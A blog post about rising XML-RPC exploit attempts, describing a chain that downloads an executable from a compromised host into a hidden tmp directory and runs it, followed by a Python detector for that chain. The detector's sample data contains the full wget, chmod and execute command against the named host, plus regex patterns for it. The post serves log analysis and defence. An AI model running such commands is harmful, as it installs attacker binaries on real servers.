This past week I've talked about XML-RPC a bit in relation to this blog and the software that it runs. Although I have always seen a decent number of XML-RPC exploit attempts in the web logs, they seem to be on the rise lately.
It might just be a fluke, but it makes me wonder overall. One of the more interesting ones tries to make a "..." directory in your global tmp directory, grab a file from an exploited/rooted website, set it to be executable, then launch it as a pseudo-httpd.
I'm working on trying to contact the people running "http://xinad.dog-on-line.com" to get the exploit code taken off their site. I won't mention the full URL because it would be easy to grab this statically linked executable and set up more compromised websites with it. You might want to block traffic from there in the meantime.
All in all, it just increases my love for mod_security.
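A small detector for the chain described above, written as an added example that is not part of the original post: it scores a request path and body (for instance one pulled from a mod_security audit log) against the indicators the post lists, the "..." tmp directory, the named host, the chmod, and the httpd-looking launch. The regex wording, the decision rule and the sample requests are assumptions constructed for this example.

```python
import html
import re
from dataclasses import dataclass

# Indicators drawn from the chain the post describes: a "..." directory under the
# system tmp directory, a download from the host the post names, the file being
# made executable, and a process launched from tmp under an httpd-like name.
# The regex wording is an assumption made for this example, not a published rule.
INDICATORS = {
    "dotdotdot_tmp_dir": re.compile(r"(?:/tmp|/var/tmp)/\.\.\.(?=[/\s;|&]|$)"),
    "fetch_from_named_host": re.compile(r"\bxinad\.dog-on-line\.com\b", re.I),
    "chmod_executable": re.compile(r"\bchmod\s+(?:[ugoa]*\+[rw]*x|[0-7]*[1357][0-7]*)\b"),
    "httpd_from_tmp": re.compile(r"(?:/tmp|/var/tmp)/[^\s;|&]*httpd\b|\./[^\s;|&]*httpd\b"),
}
XMLRPC_PATH = re.compile(r"/xmlrpc(?:\.php)?(?:$|[/?])", re.I)

@dataclass
class Finding:
    path: str
    matched: list
    suspicious: bool

def analyze_request(path: str, body: str) -> Finding:
    """Score one request (path plus raw body) against the chain indicators."""
    # XML-RPC bodies are XML, so shell text inside them is usually entity-encoded
    # ("&amp;", "&gt;"); decode before matching or the chain is easy to miss.
    text = html.unescape(body)
    matched = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Decision rule (an assumption): one indicator on an XML-RPC endpoint,
    # or two indicators on any endpoint, is enough to flag the request.
    suspicious = (bool(XMLRPC_PATH.search(path)) and len(matched) >= 1) or len(matched) >= 2
    return Finding(path, matched, suspicious)

# Constructed sample requests, not captured traffic; the file path is withheld.
SAMPLES = {
    "benign_pingback": ("/xmlrpc.php",
        "<methodCall><methodName>pingback.ping</methodName><params><param><value>"
        "<string>http://example.com/post/1</string></value></param></params></methodCall>"),
    "chain_in_xmlrpc": ("/xmlrpc.php",
        "<methodCall><methodName>test.method</methodName><params><param><value><string>"
        "mkdir /tmp/...; cd /tmp/...; wget http://xinad.dog-on-line.com/FILE-WITHHELD; "
        "chmod +x httpd; ./httpd &amp;</string></value></param></params></methodCall>"),
    "chain_elsewhere": ("/index.php", "cmd=cd /var/tmp/... &amp;&amp; chmod 755 httpd"),
    "plain_xmlrpc_chmod": ("/blog/xmlrpc.php", "please chmod 644 notes.txt"),
}

def scan_samples() -> dict:
    """Run every sample through the detector; returns name -> Finding."""
    return {name: analyze_request(path, body) for name, (path, body) in SAMPLES.items()}

if __name__ == "__main__":
    for name, finding in scan_samples().items():
        print(f"{name:20} suspicious={finding.suspicious} matched={finding.matched}")
```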
For the curious, this is what 'file' has to say about the file the exploit tries to download:
"skript-kiddies-r-us: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, corrupted section header size"
I'll probably run it through gdb on a VM to see what it does, or take the easy way and see what strace shows in a VM that is isolated from any network.